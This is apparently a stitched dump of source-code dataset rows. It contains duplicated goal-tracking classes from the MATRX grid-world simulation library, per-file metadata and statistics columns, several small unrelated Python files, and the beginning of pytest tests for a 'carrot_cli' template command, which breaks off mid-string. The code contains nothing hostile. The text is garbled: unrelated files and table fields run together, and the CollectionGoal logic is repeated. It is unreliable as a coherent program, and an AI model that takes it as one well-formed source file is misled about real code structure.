# required object, check if it is one of the desired objects. Also, ignore all drop off tiles and targets.
detected_objs = {}
for obj_id in obj_ids:
obj_props = all_[obj_id].properties
# Check if the object is either a collection area tile or a collection target object, if so skip it
if ("is_drop_off" in obj_props.keys() and "collection_area_name" in obj_props.keys()) \
or ("is_drop_off_target" in obj_props.keys() and "collection_zone_name" in obj_props.keys()
and "is_invisible" in obj_props.keys()):
continue
for req_props in self.__target:
obj_props = utils._flatten_dict(obj_props)
if req_props.items() <= obj_props.items():
detected_objs[obj_id] = curr_tick
# Now compare the detected objects with the previous detected objects to see if any new objects were detected
# and thus should be added to the dropped objects
is_updated = False
for obj_id in detected_objs.keys():
if obj_id not in self.__dropped_objects.keys():
is_updated = True
self.__dropped_objects[obj_id] = detected_objs[obj_id]
# Check if any objects detected previously are now not detected anymore, as such they need to be removed.
removed = []
for obj_id in self.__dropped_objects.keys():
if obj_id not in detected_objs.keys():
removed.append(obj_id)
for obj_id in removed:
is_updated = True
self.__dropped_objects.pop(obj_id, None)
# If required (and needed), check if the dropped objects are dropped in order by tracking the rank up which the
# dropped objects satisfy the requested order.
if self.__in_order and is_updated:
# Sort the dropped objects based on the tick they were detected (in ascending order)
sorted_dropped_obj = sorted(self.__dropped_objects.items(), key=lambda x: x[1], reverse=False)
rank = 0
for obj_id, tick in sorted_dropped_obj:
props = all_[obj_id].properties
props = utils._flatten_dict(props)
req_props = self.__target[rank]
if req_props.items() <= props.items():
rank += 1
else:
# as soon as the next object is not the one we expect, we stop the search at this attained rank.
break
# The goal is done as soon as the attained rank is equal to the number of requested objects
is_satisfied = rank == len(self.__target)
# Store the attained rank, used to measure the progress
self.__attained_rank = rank
# objects do not need to be collected in order and new ones were dropped
elif is_updated:
# The goal is done when the number of collected objects equal the number of requested objects
is_satisfied = len(self.__dropped_objects) == len(self.__target)
# no new objects detected, so just return the past values
else:
is_satisfied = self.is_done
return is_satisfied
def get_progress(self, grid_world):
# If we are done, just return 1.0
if self.is_done:
return 1.0
# Check if the order matters, if so calculated the progress based on the maximum attained rank of correct
# ordered collected objects.
if self.__in_order:
# Progress is the currently attained rank divided by the number of requested objects
progress = self.__attained_rank / len(self.__target)
# If the order does not matter, just calculate the progress as the number of correctly collected/dropped
# objects.
else:
# Progress the is the number of collected objects divided by the total number of requested objects
progress = len(self.__dropped_objects) / len(self.__target)
return progress
@classmethod
def get_random_order_property(cls, possibilities, length=None, with_duplicates=False):
""" Creates a `RandomProperty` representing a list of potential objects to collect in a certain order.
Parameters
----------
possibilities: iterable
An iterable (e.g. list, tuple, etc.) of dictionaries representing property_name, property_value pairs that
can be collected.
length: int (optional, default None)
The number of objects that need to be sampled from `possibilities` to be collected.
with_duplicates: bool (optional, default False)
Whether entries in `possibilities` can occur more than once in the lists.
Returns
-------
RandomProperty
A random property representing all possible lists of collection objects. Each list differs in the order of
the objects. If length < len(possibilities), not all objects may be in each list. If with_duplicates=True,
some objects might occur more than once in a list. This random property can be given to a `CollectionGoal`
who will sample one of these lists every time a world is run. This allows a world with a `CollectionGoal`
to denote different collection goals each time but still based on all properties in `possibilities`.
Examples
--------
>>> from matrx import WorldBuilder
>>> from matrx.logger import LogActions
>>> from matrx.objects import SquareBlock
>>> from matrx.goals import CollectionGoal
>>> builder = WorldBuilder(shape=(3, 3))
>>> builder.add_object([0, 0], "Red Block", callable_class=SquareBlock, visualize_colour="#eb4034")
>>> builder.add_object([1, 1], "Blue Block", callable_class=SquareBlock, visualize_colour="#3385e8")
Add a collection goal, where we should collect red and blue blocks but every time we run the world, in a different
order. To do so, we need to pass a RandomProperty to `add_collection_goal` which it uses to sample such an
order each created world. We call this utility method to get us such a RandomProperty.
>>> rp_order = CollectionGoal.get_random_order_property([{'visualize_colour': 'eb4034'}, {'visualize_colour': '3385e8'}])
>>> builder.add_collection_goal("Drop", [(2, 2)], rp_order, in_order=True)
See Also
--------
:meth:`matrx.world_builder.WorldBuilder.add_collection_goal`
The method that receives this return value.
:class:`matrx.world_builder.RandomProperty`
The class representing a property with a random value each world creation.
"""
if length is None:
length = len(possibilities)
if not with_duplicates:
orders = itertools.permutations(possibilities, r=length)
else: # with_duplicates
orders = itertools.product(possibilities, repeat=length)
orders = list(orders)
rp_orders = matrx.world_builder.RandomProperty(values=orders)
return rp_orders
class WorldGoalV2:
"""
A class that tracks whether the simulation has reached its global goal.
"""
def __init__(self):
"""
We set the self.is_done to False as a start.
"""
self.is_done = False
def goal_reached(self, world_state, grid_world):
"""
Returns whether the global goal of the simulated grid world is accomplished. This method should be overridden
by a new goal.
Parameters
----------
world_state : State
The entire world state. Used to search and read objects within the world to check for world completion.
grid_world : GridWorld
The actual grid world instance. For access to components not present in the world state, such as the
messages send between agents and user input from human agents.
Returns
-------
goal_reached : bool
True when the goal is reached, False otherwise.
"""
pass
def get_progress(self, world_state, grid_world):
"""
Returns the progress of reaching the global goal in the simulated grid world. This method can be overridden
if you want to track the progress. But is not required.
Parameters
----------
world_state : State
The entire world state. Used to search and read objects within the world to check for world completion.
grid_world : GridWorld
The actual grid world instance. For access to components not present in the world state, such as the
messages send between agents and user input from human agents.
Returns
-------
progress : float
Representing with 0.0 no progress made, and 1.0 that the goal is reached.
"""
pass
def reset(self):
""" Resets this goal's completion boolean and returns a copy of this object."""
self.is_done = False
return copy.deepcopy(self)
class LimitedTimeGoalV2(WorldGoalV2):
"""
A world goal that simply tracks whether a maximum number of ticks has been reached.
"""
def __init__(self, max_nr_ticks):
""" Initialize the LimitedTimeGoal by saving the `max_nr_ticks`.
"""
super().__init__()
self.max_nr_ticks = max_nr_ticks
def goal_reached(self, world_state, grid_world):
""" Returns whether the number of specified ticks has been reached.
Parameters
----------
world_state : State
The entire world state. Used to search and read objects within the world to check for world completion.
grid_world : GridWorld
The actual grid world instance. For access to components not present in the world state, such as the
messages send between agents and user input from human agents.
Returns
-------
goal_reached : bool
True when the goal is reached, False otherwise.
Examples
--------
For an example, see :meth:`matrx.grid_world.__check_simulation_goal`
Checking all simulation goals from e.g. action, world goal, or somewhere else with access to the Gridworld,
the function can be used as below:
>>> goal_status = {}
>>> if grid_world.simulation_goal is not None:
>>> if isinstance(grid_world.simulation_goal, list):
>>> for sim_goal in grid_world.simulation_goal:
>>> is_done = sim_goal.goal_reached(grid_world)
>>> goal_status[sim_goal] = is_done
>>> else:
>>> is_done = grid_world.simulation_goal.goal_reached(grid_world)
>>> goal_status[grid_world.simulation_goal] = is_done
>>>
>>> is_done = np.array(list(goal_status.values())).all()
"""
nr_ticks = grid_world.current_nr_ticks
if self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0:
self.is_done = False
else:
if nr_ticks >= self.max_nr_ticks:
self.is_done = True
else:
self.is_done = False
return self.is_done
def get_progress(self, world_state, grid_world):
""" Returns the progress of reaching the LimitedTimeGoal in the simulated grid world.
Parameters
----------
world_state : State
The entire world state. Used to search and read objects within the world to check for world completion.
grid_world : GridWorld
The actual grid world instance. For access to components not present in the world state, such as the
messages send between agents and user input from human agents.
Returns
-------
progress : float
Representing with 0.0 no progress made, and 1.0 that the goal is reached.
Examples
--------
Checking all simulation goals from e.g. action, world goal, or somewhere else with access to the Gridworld,
the function can be used as below.
In this example we know there is only 1 simulation goal.
>>> progress = grid_world.simulation_goal.get_progress(grid_world)
>>> print(f"The simulation is {progress * 100} percent complete!")
"""
if self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0:
return 0.
return min(1.0, grid_world.current_nr_ticks / self.max_nr_ticks)
class CollectionGoalV2(WorldGoalV2):
def __init__(self, name, target_name, in_order=False):
super().__init__()
# Store the attributes
self.__area_name = name
self.__target_name = target_name
self.__in_order = in_order
# Set attributes we will use to speed up things and keep track of collected objects
self.__drop_off_locs = None # all locations where objects can be dropped off
self.__target = None # all (ordered) objects that need to be collected described in their properties
self.__dropped_objects = {} # a dictionary of the required dropped objects (id as key, tick as value)
self.__attained_rank = 0 # The maximum attained rank of the correctly collected objects (only used if in_order)
def goal_reached(self, world_state, grid_world):
if self.__drop_off_locs is None: # find all drop off locations, its tile ID's and goal blocks
self.__drop_off_locs = []
self.__find_drop_off_locations(grid_world)
# Raise exception if no drop off locations were found.
if len(self.__drop_off_locs) == 0:
raise ValueError(f"The CollectionGoal {self.__area_name} could not find a "
f"{CollectionDropOffTile.__name__} with its 'collection_area_name' set to "
f"{self.__area_name}.")
if self.__target is None: # find all objects that need to be collected (potentially in order)
self.__target = []
self.__find_collection_objects(grid_world)
# Go all drop locations and check if the requested objects are there (potentially dropped in the right order)
is_satisfied = self.__check_completion(grid_world)
self.is_done = is_satisfied
return is_satisfied
def __find_drop_off_locations(self, grid_world):
all_objs = grid_world.environment_objects
for obj_id, obj in all_objs.items():
if 'name' in obj.properties.keys() \
and self.__area_name == obj.properties['name']:
loc = obj.location
self.__drop_off_locs.append(loc)
def __find_collection_objects(self, grid_world):
all_objs = grid_world.environment_objects
for obj_id, obj in all_objs.items():
if 'collection_zone_name' in obj.properties.keys() \
and self.__area_name == obj.properties['collection_zone_name']\
and 'collection_objects' in obj.properties and 'is_drop_off_target' in obj.properties\
and obj.properties['is_drop_off_target']:
self.__target = obj.properties['collection_objects'].copy()
# Raise warning if no target object was found.
if len(self.__target) == 0:
warnings.warn(f"The CollectionGoal {self.__area_name} could not find a {CollectionTarget.__name__} "
f"object or its 'collection_objects' property is empty.")
def __check_completion(self, grid_world):
# If we were already done before, we return the past values
if self.is_done:
return self.is_done
# Get the current tick number
curr_tick = grid_world.current_nr_ticks
# Retrieve all objects and the drop locations (this is the most performance heavy; it loops over all drop locs
# and queries the world to locate all objects at that point through distance calculation. Note: this calculation
# is not required, as the range is zero!).
obj_ids = [obj_id for loc in self.__drop_off_locs
for obj_id in grid_world.get_objects_in_range(loc, sense_range=0, object_type=None).keys()]
# Get all world objects and agents
all_objs = grid_world.environment_objects
all_agents = grid_world.registered_agents
all_ = {**all_objs, **all_agents}
# Go through all objects at the drop off locations. If an object was not already detected before as a
# required object, check if it is one of the desired objects. Also, ignore all drop off tiles and targets.
detected_objs = {}
for obj_id in obj_ids:
obj_props = all_[obj_id].properties
# Check if the object is either a collection area tile or a collection target object, if so skip it
if ("is_drop_off" in obj_props.keys() and "collection_area_name" in obj_props.keys()) \
or ("is_drop_off_target" in obj_props.keys() and "collection_zone_name" in obj_props.keys()
and "is_invisible" in obj_props.keys()):
continue
for req_props in self.__target:
obj_props = utils._flatten_dict(obj_props)
if req_props.items() <= obj_props.items():
detected_objs[obj_id] = curr_tick
# Now compare the detected objects with the previous detected objects to see if any new objects were detected
# and thus should be added to the dropped objects
is_updated = False
for obj_id in detected_objs.keys():
if obj_id not in self.__dropped_objects.keys():
is_updated = True
self.__dropped_objects[obj_id] = detected_objs[obj_id]
# Check if any objects detected previously are now not detected anymore, as such they need to be removed.
removed = []
for obj_id in self.__dropped_objects.keys():
if obj_id not in detected_objs.keys():
removed.append(obj_id)
for obj_id in removed:
is_updated = True
self.__dropped_objects.pop(obj_id, None)
# If required (and needed), check if the dropped objects are dropped in order by tracking the rank up which the
# dropped objects satisfy the requested order.
if self.__in_order and is_updated:
# Sort the dropped objects based on the tick they were detected (in ascending order)
sorted_dropped_obj = sorted(self.__dropped_objects.items(), key=lambda x: x[1], reverse=False)
rank = 0
for obj_id, tick in sorted_dropped_obj:
props = all_[obj_id].properties
props = utils._flatten_dict(props)
req_props = self.__target[rank]
if req_props.items() <= props.items():
rank += 1
else:
# as soon as the next object is not the one we expect, we stop the search at this attained rank.
break
# The goal is done as soon as the attained rank is equal to the number of requested objects
is_satisfied = rank == len(self.__target)
# Store the attained rank, used to measure the progress
self.__attained_rank = rank
# objects do not need to be collected in order and new ones were dropped
elif is_updated:
# The goal is done when the number of collected objects equal the number of requested objects
is_satisfied = len(self.__dropped_objects) == len(self.__target)
# no new objects detected, so just return the past values
else:
is_satisfied = self.is_done
return is_satisfied
def get_progress(self, world_state, grid_world):
# If we are done, just return 1.0
if self.is_done:
return 1.0
# Check if the order matters, if so calculated the progress based on the maximum attained rank of correct
# ordered collected objects.
if self.__in_order:
# Progress is the currently attained rank divided by the number of requested objects
progress = self.__attained_rank / len(self.__target)
# If the order does not matter, just calculate the progress as the number of correctly collected/dropped
# objects.
else:
# Progress the is the number of collected objects divided by the total number of requested objects
progress = len(self.__dropped_objects) / len(self.__target)
return progress
@classmethod
def get_random_order_property(cls, possibilities, length=None, with_duplicates=False):
""" Creates a `RandomProperty` representing a list of potential objects to collect in a certain order.
Parameters
----------
possibilities: iterable
An iterable (e.g. list, tuple, etc.) of dictionaries representing property_name, property_value pairs that
can be collected.
length: int (optional, default None)
The number of objects that need to be sampled from `possibilities` to be collected.
with_duplicates: bool (optional, default False)
Whether entries in `possibilities` can occur more than once in the lists.
Returns
-------
RandomProperty
A random property representing all possible lists of collection objects. Each list differs in the order of
the objects. If length < len(possibilities), not all objects may be in each list. If with_duplicates=True,
some objects might occur more than once in a list. This random property can be given to a `CollectionGoal`
who will sample one of these lists every time a world is run. This allows a world with a `CollectionGoal`
to denote different collection goals each time but still based on all properties in `possibilities`.
Examples
--------
>>> from matrx import WorldBuilder
>>> from matrx.logger import LogActions
>>> from matrx.objects import SquareBlock
>>> from matrx.goals import CollectionGoal
>>> builder = WorldBuilder(shape=(3, 3))
>>> builder.add_object([0, 0], "Red Block", callable_class=SquareBlock, visualize_colour="#eb4034")
>>> builder.add_object([1, 1], "Blue Block", callable_class=SquareBlock, visualize_colour="#3385e8")
Add a collection goal, where we should collect red and blue blocks but every time we run the world, in a different
order. To do so, we need to pass a RandomProperty to `add_collection_goal` which it uses to sample such an
order each created world. We call this utility method to get us such a RandomProperty.
>>> rp_order = CollectionGoal.get_random_order_property([{'visualize_colour': 'eb4034'}, {'visualize_colour': '3385e8'}])
>>> builder.add_collection_goal("Drop", [(2, 2)], rp_order, in_order=True)
See Also
--------
:meth:`matrx.world_builder.WorldBuilder.add_collection_goal`
The method that receives this return value.
:class:`matrx.world_builder.RandomProperty`
The class representing a property with a random value each world creation.
"""
if length is None:
length = len(possibilities)
if not with_duplicates:
orders = itertools.permutations(possibilities, r=length)
else: # with_duplicates
orders = itertools.product(possibilities, repeat=length)
orders = list(orders)
rp_orders = matrx.world_builder.RandomProperty(values=orders)
return rp_orders
| 45.245358
| 130
| 0.623567
| 4,375
| 34,115
| 4.665371
| 0.0912
| 0.036157
| 0.011758
| 0.010974
| 0.971241
| 0.971241
| 0.971241
| 0.971241
| 0.968791
| 0.967909
| 0
| 0.005046
| 0.308721
| 34,115
| 753
| 131
| 45.305445
| 0.86045
| 0.502741
| 0
| 0.937931
| 0
| 0.003448
| 0.08028
| 0.017087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096552
| false
| 0.013793
| 0.024138
| 0
| 0.210345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d562af3cb6e6904bc25753c74260601fe90b34d2
| 89
|
py
|
Python
|
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
from trollius import From
from trollius import Return
from trollius import ensure_future
| 22.25
| 34
| 0.865169
| 13
| 89
| 5.846154
| 0.461538
| 0.473684
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 89
| 3
| 35
| 29.666667
| 0.987013
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d589d9d0bfea6b225b90c142ce4ea0fe2636129e
| 385
|
py
|
Python
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 8
|
2020-03-04T22:16:06.000Z
|
2022-02-13T20:04:49.000Z
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 2
|
2020-03-23T21:43:40.000Z
|
2020-05-06T13:17:39.000Z
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 4
|
2020-02-09T23:24:08.000Z
|
2022-01-10T07:21:28.000Z
|
print("(a) atelectasis", "results/U-Final-Sanity/test/visuals/cams/91")
# print("(b) consolidation", "results/U-Final-Sanity/test/visuals/cams/20")
print("(b) consolidation", "results/U-Final-Sanity/test/visuals/cams/76")
print("(c) cardiomegaly", "results/U-Final-Sanity/test/visuals/cams/80")
print("(d) multi-view bilateral effusion", "results/U-Final-Sanity/test/visuals/cams/146")
| 77
| 90
| 0.742857
| 58
| 385
| 4.931034
| 0.413793
| 0.13986
| 0.227273
| 0.332168
| 0.727273
| 0.727273
| 0.727273
| 0.370629
| 0.370629
| 0.370629
| 0
| 0.029891
| 0.044156
| 385
| 5
| 90
| 77
| 0.747283
| 0.18961
| 0
| 0
| 0
| 0
| 0.81672
| 0.55627
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
635d638721d71ec9932eecf76e9709bb6ff7a55e
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name1_1_1_0_0_3_0 = None
name1_1_1_0_0_3_1 = None
name1_1_1_0_0_3_2 = None
name1_1_1_0_0_3_3 = None
name1_1_1_0_0_3_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.4
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
636ce59e5ab8a617b4db0697e96cb36d3669fd85
| 40
|
py
|
Python
|
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
def waitForConnection():
return True
| 20
| 24
| 0.75
| 4
| 40
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 25
| 20
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
639eb6a08efd88df74f440ec338e1dc462f7342e
| 60,946
|
py
|
Python
|
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | 18
|
2021-06-04T19:44:52.000Z
|
2022-02-23T19:34:47.000Z
|
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import logging
from click.testing import CliRunner
import mockito
import pytest
from carrot_cli.__main__ import main_entry as carrot
from carrot_cli.config import manager as config
from carrot_cli.rest import runs, template_reports, template_results, templates
@pytest.fixture(autouse=True)
def unstub():
yield
mockito.unstub()
@pytest.fixture(autouse=True)
def no_email():
mockito.when(config).load_var_no_error("email").thenReturn(None)
@pytest.fixture(
params=[
{
"args": ["template", "find_by_id", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_by_id", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_by_id_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).find_by_id(...).thenReturn(None)
# Mock up request response
mockito.when(templates).find_by_id(request.param["args"][2]).thenReturn(
request.param["return"]
)
return request.param
def test_find_by_id(find_by_id_data):
runner = CliRunner()
result = runner.invoke(carrot, find_by_id_data["args"])
assert result.output == find_by_id_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"find",
"--template_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--pipeline_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--pipeline_name",
"Sword of Protection pipeline",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/rebellion_test.wdl",
"--eval_wdl",
"example.com/rebellion_eval.wdl",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(name)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"Sword of Protection template",
"Sword of Protection pipeline",
"This template will save Etheria",
"example.com/rebellion_test.wdl",
"example.com/rebellion_eval.wdl",
"adora@example.com",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"asc(name)",
1,
0,
],
"return": json.dumps(
[
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/rebellion_test.wdl",
"eval_wdl": "example.com/rebellion_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find",
"--template_id",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No templates found",
"status": 404,
"detail": "No templates found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).find(...).thenReturn(None)
# Mock up request response
mockito.when(templates).find(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
request.param["params"][5],
request.param["params"][6],
request.param["params"][7],
request.param["params"][8],
request.param["params"][9],
request.param["params"][10],
request.param["params"][11],
request.param["params"][12],
).thenReturn(request.param["return"])
return request.param
def test_find(find_data):
runner = CliRunner()
result = runner.invoke(carrot, find_data["args"])
assert result.output == find_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"create",
"--pipeline_id",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
"--created_by",
"adora@example.com",
],
"params": [
"Sword of Protection template",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"This template will save Etheria",
"example.com/she-ra_test.wdl",
"example.com/she-ra_eval.wdl",
"adora@example.com",
],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"create",
"--pipeline_id",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "create"],
"params": [],
"return": "Usage: carrot_cli template create [OPTIONS]\n"
"Try 'carrot_cli template create --help' for help.\n"
"\n"
"Error: Missing option '--pipeline_id'.",
},
]
)
def create_data(request):
# Set all requests to return None so only the one we expect will return a value
mockito.when(templates).create(...).thenReturn(None)
# Mock up request response only if we expect it to get that far
if len(request.param["params"]) > 0:
mockito.when(templates).create(
request.param["params"][0],
request.param["params"][1],
request.param["params"][2],
request.param["params"][3],
request.param["params"][4],
request.param["params"][5],
).thenReturn(request.param["return"])
return request.param
def test_create(create_data, caplog):
runner = CliRunner()
result = runner.invoke(carrot, create_data["args"])
if "logging" in create_data:
assert create_data["logging"] in caplog.text
else:
assert result.output == create_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"update",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--description",
"This new template replaced the broken one",
"--name",
"New Sword of Protection template",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"New Sword of Protection template",
"This new template replaced the broken one",
"example.com/she-ra_test.wdl",
"example.com/she-ra_eval.wdl",
],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "update"],
"params": [],
"return": "Usage: carrot_cli template update [OPTIONS] ID\n"
